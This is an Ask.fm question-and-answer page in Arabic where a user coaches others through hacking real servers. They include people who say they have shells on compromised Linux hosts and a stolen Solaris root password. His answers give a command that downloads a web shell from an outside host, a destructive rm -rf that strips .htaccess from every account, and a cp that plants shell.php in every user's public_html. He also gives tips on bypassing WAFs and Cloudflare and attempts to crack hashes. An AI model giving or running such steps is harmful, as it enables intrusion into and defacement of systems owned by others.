@ElSyad

Ahmed ElSyad

Ask me anything Follow
Ask @ElSyad

Sort by:

LatestTop

Previous

اخى انا بستعمل برنامج هافيج فى الحقن ولكن مش عارف ازاى اتخطى الفوربيد والفلتره والاكسبت 404 ممكن تفيدنىاخى الفاضل

الهافج هو مجرد اداة مساعدة او لاستغلال ثغرات الحقن اتوماتيكى بدل تنفيذ اوامر او استعلامات SQL من خلالك
الافضل دايما فى حكاية التخطى للحمايات بيكون من خلال الحقن اليدوى
ان شاء الله هبقى ارفع ليك كام دورة هتفيدك جدا فى المجال ده على المدونة واديك خبر
طيب بخصوص الحل دلوقتى
ممكن تستخدم اداة افضل من الهافج وهيا Sqlmap
ده رابط الموقع الرسمى للاداة هتحمل الصيغة .zip
http://sqlmap.org/
وده شرح فديو لطريقة التحميل وتثبيت الاداة
https://www.youtube.com/watch?v=ksYQRsTwGcsElSyad’s Video 136611764392 ksYQRsTwGcsElSyad’s Video 136611764392 ksYQRsTwGcs
بخصوص الهافج فى بعض الطرق اللى ممكن تتخطى بيها بعض الحمايات موجودة فيه
ان شاء الله هنزل شرح مفصل ليه فى موضوع ع المدونة

الله يوفقك يااارب

امين وجزاك الله عنا كل خير
شكرا للدعوة الجميلة دى

السلام عليكم لو في عندي موقع مركب كلاود فلير كيف بدي اعرف الايبي الحقيقي مع العلم انو الموقع سب دومين "/

فيه طرق كتيرة عشان تتخطى بيها الكلاود فلير
مثلا الموضوع ده
http://www.v4-team.com/cc/showthread.php?t=143881
وغيره كله موجود فى Google

People you may like

HessienMohamed901’s Profile Photo Hussain Mohamed
also likes
Mido9695’s Profile Photo Mahmed Y Ahmed
also likes
abdokhaled5’s Profile Photo Abdelrahman | Hacker
also likes
Abdallah_Hashem1296’s Profile Photo Abdallah Hashem
also likes
faisal_fathe’s Profile Photo Faisal Fathe
also likes
Want to make more friends? Try this: Tell us what you like and find people with the same interests. Try this:
#fun #indie #beauty #sport #movies #electronicmusic #summer #movies #electronicmusic #music
+ add more interests + add your interests

السلام عليكم اخي بتقدر تنزل طريقة الدروبال الي حكيتلي عنها ؟

هنزلها ان شاء الله ي ريس
هعمل بس فديو بيها وانزلها
المشكلة فى الوقت لان المدونة والله مش مخليانى حتى اذاكر اى حاجة

يعني عندي كم باسورد ويزرنيم شاكك انهم هما باسورد الروت تبع السيرفر بنسبة 80% بدي افوت على البيوتي اجربهم واجهتني هاي المكشلة

محتاجين صلاحيات رووت عشان نقدر ننفذ كام امر عشان نشوف كام حاجة ي صديقى
اذا معاك رووت يبقى تمام وان شاء الله هنحل المشكلة
رووت هنا قصدى انه انت معاك لوكال ورفعت بيه صلاحياتك او غيرها

معي اليورز نيم والباسورد تبع الروت لسيرفر السلاريس اه معي بس جبتهم مش عن طريق شل :P والمشكلة هي من الدخول من البيوتي

اه يعنى انت مش عندك صلاحيات رووت اساسا :)
بس كنا محتاجين ننفذ كام امر عشان نعرف ي صديقى كام حاجة

مع العلم انو سيرفرات اللينكس فيهم نفس جدار الحماية وفتح عادي

طيب ممكن تتاكد ان الخدمة موجودة على سولاريس
اصل انا بصراحة حطيتلك تقريبا كده كل حاجة ممكن تعطلك الاتصال وتظهرلك الرسالة دى
او استنى كده
شفت رد لواحد من الاجانب :)
روح على مسار الخدمة
/etc/ssh
وشوف الملفات اللى بتكون على الشكل ده تقريبا
ssh_host_*_key
مكان * بيكون اسم طبعا
اذا كانت المساحة بتاعت الملفات دى 0 بايت
يبقى فى مشكلة ورد عليا هنا واحطلك حلها
افتكر ان المشكلة دى تعمل ال error ده معاك

المشكلة مش هون ببساطة القصة انو عندي مثلا 9 مواقع لنفس الادمن ونفس الخدمات ونفس الفايرول 3 من المواقع مركبين على سيرفرات وندوز 5 سيرفرات لينكس 1 سيرفر سولايس كلهم عليهم فايرول انا رافع شلاتي على سيرفرات اللينكس واخترقتهم كلهم بس سيرفر السولاريس بدي اخمن على الروت تبعو واجهتني هاي المشكلة

ما شاء الله :)
انت على كلامك الاول ان معاك رووت على سولاريس بس المشكلة فى الدخول من البيوتى

بخصوص البورت انا متاكد انو مفتووح 1000% فحصتو جدار الحماية في السيرفر قوووي بشكل خيالي لدرجة انو بعمل باند بسرعة على اي اشي بشك انو فيه اوامر حقن

طيب ي باشا ممكن الفايروال يكون هو السبب
اقفل القايروال على السيرفر
بس المشكلة انه انا مش اتعاملت مع النسخة دى عشان افيدك فى الاوامر
لو تقدر تفيدنا باسم برنامج الفايروال اللى على السيرفر يبقى كويس
هشوفلك انا اوامر تعطيله على النسخة دى ايه
وتعطله وان شاء الله بعد كده هيتصل معاك
بس الاول انت نفذت الخطوات اللى قولتلك عليها ؟
قرأت ملف sshd_config ?

بخصوص سؤال ssh

ElSyad’s Profile PhotoAhmed ElSyad
متاكد ان الفايروال متعطل على السيرفر
اتاكد برضو من الخطوة دى
بخصوص الاوامر معلش لانى مش اتعاملت مع Solaris قبل كده

خليتها 5 عالفاضي :/

متاكد ان الخدمة شغالة اصلا على السيرفر ؟
متاكد ان الدخول ل ssh مفعل على السيرفر ؟
متاكد ان تم تثبيت الخدمة اصلا على السيرفر ؟
اقرأ ملف
/etc/ssh/sshd_config
او جرب تحط الامر ده عشان تعرف ان الخدمة موجودة اصلا ولا لا
الامر ده عشان تعمل رستارت للخدمة
svcadm restart ssh
مستنيك

https://ask.fm/ElSyad/answers/136408357032 طيب اخي بخصوص هاد السؤال البورت زي ماحكيتلك مفتوح وانا جبت باسورد الروت بطريقة معينة وبدي اعمل اتصال مع السيرفر عن طريق ال putty ولما اعمل بجيبلي المشكلة الي في الصورة طبعا قبل تسجيل الدخول

متاكد ان بورت الشل 22 ؟
من النت كات نفذلى الامر ده
cat /etc/ssh/sshd_config
ودور على كلمة Port
هتلاقى بورت الاتصال بتاع الشل الافتراضى 22 لو متغير هتلاقيه
وابقى شوف ردى على السؤال اللى قبل ده معلش عشان كنت بصلى الظهر

قبل مااسجل الدخولوكمان نوع نظام التشغيل Solari

طب المشكلة دى ظهرت معاك مع اى سيرفر تتصل بيه ؟
هل انت كنت مسجل دخول وبعد ظهرتلك المشكلة دى ؟
اقفل الفايروال بتاعك
او انك تعدل على KeepAlive
http://i.stack.imgur.com/1O53M.png
خليها زى دى كده 5
وابقى قول اتحلت معاك ولا لا

انت حكيتلي اخي كيف انسخ ملف الشل بس مهو الملف مش موجود كيف بدي ارفعو على السيرفر ؟

افتكر انك صاحب السؤال ده
https://ask.fm/ElSyad/answers/136362570664
ابقى حط رابط الاسئلة اذا كانت المشكلة مش اتحلت عشان اقدر اعرف سؤالك كله :)
ببساطة شديدة ي صديقى ممكن تسحب الشل على اى يوزر من عندك بالامر
wget domain.tld/shell.txt -O shell.php
واضح الامر طبعا
domain.tld
بتكون رافع اى شل بصيغة txt على اى موقع وتحطه هنا
shell.php
هو اسم الشل بعد تغير امتداده
بالتوفيق :*

طيب كيف بدي اتلاعب في ملفات ال php وانا مش رافع شل؟

من الطريقة التالتة اللى انا شرحتها على المدونة ي صديقى
مثلا تسحب شل , تنفذ اوامر على السيرفر وغيرها

اخي شو حل هاي المشكلة ؟ مع انو البورت مفتوح في السيرفر http://rghost.net/66Y5djcsX/image.png

الكلام ده قبل ما تسجل دخول على Putty ولا لا ؟
اذا كان قبل ما تسجل دخول هبقى فيه كذا حل عشان تتخطى المشكلة دى
لان فيه طرق كتيرة للمشاكل اللى زى دى
وضحلى بس زى ما قولتلك

اذا عندك سكربت كونسل بس يعني اقدر اخش على المجلدات واشوف التصاريح ؟

انا لما بجيب اى سيرفر بخلى شغلى كله RS
لانى بحب اتعامل من خلال الاوامر على طول
الشل بستخدمه فى رفع ملف ودى قليلة كمان :)
شوف اى شل مش هتفرق معاك غير لو كان Safe ,Disbable شغالين على السيرفر

السلام عليكم المرة الماضية رفعتلي شل على سكربت دروبال وانت حكيتلي على الطريقة رقم 3 جربت الطريقة مازبط معي كيف حقنت الشل في المسار ؟

وعليكم السلام
ان شاء الله هعمل فديو قريب للطريقة وهضيفها على الموضوع فى المدونة
مجرد انك تلعب فى اكواد php على الموقع

ما تفكلنا اى هاش من الهاشات دى كدة ياحمد وتبقى عملت معايا خدمة مش هنسهالك 4706b7f8bf8c8976d082d0fd18af2026 221db3b91bc2dc4b9581728ca4b9ca01 de4196691329294c69858f7d5e8352b5 انا جربت افكهم بسكربتات وبرامج كتير وملاقتش نتيجة وشكرا مقدما , واحب احييك على مساعدة الناس وربنا يكتر من امثالك

خمنت عليهم بتاع نص ساعة بس مش فكه
هخليهم فى اللستة او انى هشوفلك واحد خبير فى فك الهاشات
العفو احنا فى الخدمة

الارمتاج بدي + الميتاسبلويت اختراق السيرفرات والاجهزة والتبيغ الخارجي يوصل شو بلزم بورتات غير 4444 ؟

انا مش عندى خبرة كبيرة بيها
بس الارميتاج هيا عبارة عن واجهة رسومية لمشروع الميتاسبلويت
بخصوص البورتات
4444,80
445 or 443
موفق

شو اهم البورتات المفروض فتحها في الكالي ؟

على حسب البرنامج اللى انت عاوز تخترق منه
فى هنا شرح بسيط لفتح بورت 4444 الخاص بالميتا سبلويت
وغيرها من البورتات وطريقة فتح اى بورت انت عاوزه
https://www.youtube.com/watch?v=ooEBUjQOaFYElSyad’s Video 136371255720 ooEBUjQOaFYElSyad’s Video 136371255720 ooEBUjQOaFY

يخو هذا الناتج معلومات الكردل Linux ws05k41 3.16.0-0.bpo.4-amd64 #1 SMP Debian 3.16.7-ckt11-1+deb8u6~bpo70+1 (2015-11-11) x86_64 GNU/Linux ---- ما ضهر الاختصار بالشل للعب بال htaccess ------ من اروح للاختصار يطلع لي كلمة Forbidden

ماشى جرب الشرح ده وشوف هيتخطى معاك ولا لا
http://up.top4top.net/downloadf-top4top_e6045b4e031-rar.html
شوف هيتخطى معاك ولا لا
ويا ريت تبقى تدينى صورة احسن ي صديقى :)

مرحبا يخو . قول لي هسا انا عملت اختصار للسيرفر . كل شي تمام رحت لمسار المواقع يلي ع السيرفر طلع لي Forbidden :( ما الحل

اهلا صديقى
اول حاجة ادينى ناتج امر معرفة معلومات الكرنل كلها
uname -a
ده اول حاجة لان ممكن تكون من Hosts المعروفة او الكبيرة
طيب الحل دايما هيكون فى الاغلب من التلاعب فى اوامر ملف htaccess
بس ادينا ناتج الامر الاول وخلينا نشوف
بالمرة روح على مسار اليوزر اللى انت عليه مثال
/home/{user}/
شوف اذا فيه عندك مجلدات بالاسامى دى ولا لا
.cagefs
.cagefs.selector
عشان نعرف اذا كان مركب خدمة CageFS على السيرفر او لا
موفق

مرحبا اخي اخدت الروت من موقع وسجلت في برنامج ال putty وعندي صلاحية رووت كيف بقدر ارفع شلات على المواقع ؟

اهلا بيك ي برنس
قبل اى حاجة لازم تمسح ملفات htaccess لكل اليوزرات وده من خلال الامر التالى
rm -rf /home/*/public_html/.htaccess
بعد كده انسخ الملف من الامر cp تابع
تمام اهم حاجة لازم ترفع شل على اى يوزر والافضل تخليه على Public مثال
/home/{user}/public_html/shell.php
بعد كده ي برنس هتقوم بـ عمل نسخ لـ الشل ونخليه على كل اليوزرات وطبعا هيكون على Public
cp /home/{user}/public_html/shell.php /home/*/public_html/
واستنى شوية واتاكد من نسخ الامر بالظبط
هنا الامر هيعمل نسخ لملف shell.php ونسخه على كل يوزرات السيرفر وعلى المسار public_html
بالتوفيق

Next

Language: English

4.1

1,266,418 reviews
© Ask.fm 2024